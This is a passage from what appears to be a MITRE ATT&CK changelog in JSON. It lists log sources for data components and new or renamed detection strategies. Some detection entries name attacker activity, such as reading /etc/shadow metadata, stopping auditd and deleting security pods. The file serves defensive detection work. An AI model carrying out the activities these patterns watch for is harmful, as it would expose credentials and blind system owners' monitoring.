                            "channel": "profiles -P|getaccountpolicies"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetAccountPasswordPolicy"
                        },
                        {
                            "name": "azure:audit",
                            "channel": "operation contains 'Get*Password*Policy' OR 'List*Authentication*Policy' OR 'Get-ADDefaultDomainPasswordPolicy'"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Workload=AzureActiveDirectory OR Exchange AND (Operation=Cmdlet AND Parameters contains 'Password' AND (CmdletName='Get-*' OR CmdletName='Get-OrganizationConfig'))"
                        },
                        {
                            "name": "saas:auth",
                            "channel": "Refresh token issuance or refresh token usage from new IPs or user agents"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Directory API Access: users.list or groups.list"
                        },
                        {
                            "name": "CloudTrail:GetCallerIdentity",
                            "channel": "GetCallerIdentity"
                        },
                        {
                            "name": "vpxd.log",
                            "channel": "vCenter Management"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation of user account with UID <500"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4674"
                        },
                        {
                            "name": "windows:osquery",
                            "channel": "User enumeration with creation/last modified timestamps"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Listing of /etc/passwd and /etc/shadow metadata"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "User lifecycle events"
                        },
                        {
                            "name": "Microsoft Entra ID Audit Logs",
                            "channel": "RoleManagement.Read.Directory or Directory.Read.All"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Azure CLI Operation: Microsoft.Graph/users/read"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "IAM API call: serviceAccounts.list or projects.getIamPolicy"
                        },
                        {
                            "name": "Microsoft Graph API Logs",
                            "channel": "users.list, directoryObjects.getByIds"
                        },
                        {
                            "name": "Defender for Identity",
                            "channel": "Suspicious Enumeration of Cloud Directory"
                        },
                        {
                            "name": "Google Admin Audit",
                            "channel": "users.list, groups.list"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "PassRole"
                        },
                        {
                            "name": "gcp:iam",
                            "channel": "PrincipalEmail with serviceAccountTokenCreator impersonating new identity"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRole: Discovery actions tied to assumed identities outside of normal context"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "User Enumeration Events"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Directory API Access"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DirectoryService queries retrieving account information"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 22:24:06.660000+00:00\", \"old_value\": \"2025-10-21 15:14:38.578000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0013\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0013\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][28]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"DirectoryService queries retrieving account information\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-16 16:59:19.254000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0041",
                            "external_id": "DC0041"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Service Metadata",
                    "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Service",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=4"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "service stopped messages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl disable or bootout calls"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Stop VM or disable service events via vim-cmd"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "auditd service stopped or disabled"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "scheduled/real-time"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.launchservices"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "registers services with legitimate-sounding names"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7035"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Service restart with modified executable path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Observed loading of new LaunchAgent or LaunchDaemon plist"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "seccomp or AppArmor profile changes"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Service stopped or RecoveryDisabled set via REAgentC"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service events"
                        },
                        {
                            "name": "WinEventLog:WinRM",
                            "channel": "EventCode=6"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "delete: Modification of systemd unit files or config for security agents"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of system configuration profiles affecting security tools"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "kubectl delete or patch of security pods/admission controllers"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "write: Startup configuration changes disabling security checks"
                        },
                        {
                            "name": "auditd:DAEMON",
                            "channel": "auditd stopped, config changed, logging suspended"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 16:59:19.254000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][21]\": {\"name\": \"auditd:DAEMON\", \"channel\": \"auditd stopped, config changed, logging suspended\"}}}",
                    "previous_version": "2.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-03-13 23:12:09.029000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0063",
                            "external_id": "DC0063"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Windows Registry Key Modification",
                    "description": "Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.\n\n*Data Collection Measures:*\n\n- Windows Event Logs\n    - Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.\n- Sysmon (System Monitor) for Windows\n    - Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.\n    - Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.\n- Endpoint Detection and Response (EDR) Solutions\n    - Monitor registry modifications for suspicious behavior.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4657"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "StubPath value written under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "MacroSecuritySettingsChanged or SafeModeDisabled"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=13, 14"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "modification to Winlogon registry keys such as Shell, Notify, or Userinit"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "Registry key modification HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient\\EnableMulticast"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "g_CiOptions modification or SIP state change"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "Autoruns reports DLLs in AppInit_DLLs key"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:12:09.029000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0063\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0063\"}}, \"iterable_item_removed\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Windows Registry\", \"channel\": \"None\"}}}",
                    "previous_version": "2.0"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "detectionstrategies": {
            "additions": [
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--48923678-0fb6-4d14-986b-2f6adeb8c421",
                    "created": "2026-04-16T16:45:43.694Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0899",
                            "external_id": "DET0899"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:22:37.160Z",
                    "name": "Detect Social Engineering",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--54bb8256-cbe8-4088-9cff-b03711bd7841",
                        "x-mitre-analytic--983e1849-6af7-491e-9605-46b9bf54bbd1",
                        "x-mitre-analytic--e817eb45-0830-476d-9fd7-8e8acb14af8a",
                        "x-mitre-analytic--f238e0f3-7354-4304-9101-69cefd8446fc",
                        "x-mitre-analytic--fc19b602-2811-418f-aa98-1b49f1355743"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--488ef272-b2fa-4501-ab6e-97e3ac01816c",
                    "created": "2026-04-16T17:34:53.603Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0901",
                            "external_id": "DET0901"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:22:49.681Z",
                    "name": "Detect Windows Firewall",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--702db8b6-641f-4526-a0d0-a5a62c499508"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--ded7322c-64ba-4f6b-9aca-77a537798cab",
                    "created": "2026-04-23T18:44:43.178Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0920",
                            "external_id": "DET0920"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:23:25.386Z",
                    "name": "Detection Strategy for Invisible Unicode",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--1a9f097a-d5b9-424d-ae20-19ed73eb9dcf",
                        "x-mitre-analytic--a32c4f38-feaf-4291-9dad-3043114b4d37",
                        "x-mitre-analytic--6195e912-ed73-4ec7-a03b-097631ec0b26"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--a27b9b6b-b4b9-425c-885b-ab52834f0974",
                    "created": "2026-04-23T14:58:03.627Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0918",
                            "external_id": "DET0918"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:23:36.872Z",
                    "name": "Detection of Audio-Visual Content",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--33712883-6871-4147-8272-7cd1c6c64ad6"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--3a3820cd-260b-43d0-b5af-89b7ba81a044",
                    "created": "2026-04-16T17:13:38.727Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900",
                            "external_id": "DET0900"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:23:12.031Z",
                    "name": "Detection of Defense Impairment",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--7ec436a3-dd31-4d23-a51b-0e03d3c474bd",
                        "x-mitre-analytic--c6fb992c-387e-49ee-beaf-a1351aded262",
                        "x-mitre-analytic--f46639b5-4d99-4d52-8da9-112a468cc6d8",
                        "x-mitre-analytic--9df50fd3-bbad-43ce-b511-1bf995f1b583",
                        "x-mitre-analytic--47df93f9-b33f-4333-95b6-b3cca9418a4d"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--732ae9e0-1ff8-40bf-bc13-ea3a0bb6fee0",
                    "created": "2026-04-23T14:53:10.855Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0916",
                            "external_id": "DET0916"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:23:47.970Z",
                    "name": "Detection of Generate Content",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--360eb601-28db-4418-8474-ad2a432ce534"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--e2c3189b-34cf-4160-bc9f-2dcf4df451c6",
                    "created": "2026-04-23T14:59:37.388Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0919",
                            "external_id": "DET0919"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:23:56.287Z",
                    "name": "Detection of Query Public AI Services",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--255379f1-e115-4f3c-835a-23c8d279847e"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--bbda89d6-a007-4ba9-bfd0-cb03344fc540",
                    "created": "2026-04-23T14:56:39.987Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0917",
                            "external_id": "DET0917"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:24:06.496Z",
                    "name": "Detection of Written Content",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--3c500af0-d284-48c3-b23b-a22f8b77649d"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ]
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--a21019ad-f6d2-4806-be7b-01ba27c63147",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497",
                            "external_id": "DET0497"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:24:31.994Z",
                    "name": "Detection of Defense Impairment through Disabled or Modified Tools across OS Platforms.",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--7faf6f37-f074-4b9d-be19-618c3516486d",
                        "x-mitre-analytic--bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d",
                        "x-mitre-analytic--9e9a5111-038b-4c68-a8bc-6d094723def4",
                        "x-mitre-analytic--5d329e39-a38b-47cd-8d3d-fa7515280fd7",
                        "x-mitre-analytic--f421cbe1-d42e-45e9-adad-12c6ed0a5cb8",
                        "x-mitre-analytic--e542342f-5a08-408d-b292-797bcb2da5eb",
                        "x-mitre-analytic--2b990a38-dedf-4a9a-9bd2-9a805c2f1b46"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:24:31.994Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection of Defense Impairment through Disabled or Modified Tools across OS Platforms.\", \"old_value\": \"Detection of Impair Defenses through Disabled or Modified Tools across OS Platforms.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_analytic_refs'][6]\": \"x-mitre-analytic--2b990a38-dedf-4a9a-9bd2-9a805c2f1b46\"}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--cfedfc6c-6e31-481b-be1e-e23a760fec44",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0187",
                            "external_id": "DET0187"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:24:45.876Z",
                    "name": "Detect Disabled Windows Event Log",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--705168ad-1701-453c-9aea-c75029492b89"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:24:45.876Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detect Disabled Windows Event Log\", \"old_value\": \"Detect disabled Windows event logging\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--8577b89d-01e2-4423-8657-caff7ed22737",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0563",
                            "external_id": "DET0563"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:25:01.924Z",
                    "name": "Detection Strategy for Defense Impairment via Prevent Command History Logging across OS platforms.",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--1f69e126-e849-43a1-9fca-b5c63a154daa",
                        "x-mitre-analytic--2a5f1993-7035-4d94-b9d1-7edb1850d4e1",
                        "x-mitre-analytic--91870bc8-3a81-4d90-84e4-26c99b5642ef",
                        "x-mitre-analytic--8ed1a27f-3a60-441d-b92d-dc7b086db459",
                        "x-mitre-analytic--77450309-6789-4025-9817-d908c4ac9e5b"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:25:01.924Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection Strategy for Defense Impairment via Prevent Command History Logging across OS platforms.\", \"old_value\": \"Detection Strategy for Impair Defenses via Impair Command History Logging across OS platforms.\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--f0190654-2eda-42a7-9a4d-6edc95aada02",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0289",
                            "external_id": "DET0289"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:25:34.812Z",
                    "name": "Detection Strategy for Disable or Modify Cloud Log",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--a788e3ed-8faf-4443-bb26-fd530ca930d1",
                        "x-mitre-analytic--8e0f5333-9fc0-4f03-ae12-cf98903e08ea",
                        "x-mitre-analytic--e42656e7-6a0e-492e-82b6-90d0d5667993",
                        "x-mitre-analytic--967f7636-1547-4db7-921a-1b84f312a2cd"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:25:34.812Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection Strategy for Disable or Modify Cloud Log\", \"old_value\": \"Detection Strategy for Disable or Modify Cloud Logs\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--1d769567-7e82-47f4-8dc8-5a503f524134",
                    "created": "2025-10-21T15:10:28.402Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0062",
                            "external_id": "DET0062"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:25:52.122Z",
                    "name": "Detection Strategy for Disable or Modify Linux Audit System Log",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--3e9734aa-b9b4-4716-927c-27c2c2aa972e"
                    ],
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21T15:10:28.402Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-24T20:25:52.122Z\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['name']\": {\"new_value\": \"Detection Strategy for Disable or Modify Linux Audit System Log\", \"old_value\": \"Detection Strategy for Disable or Modify Linux Audit System\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
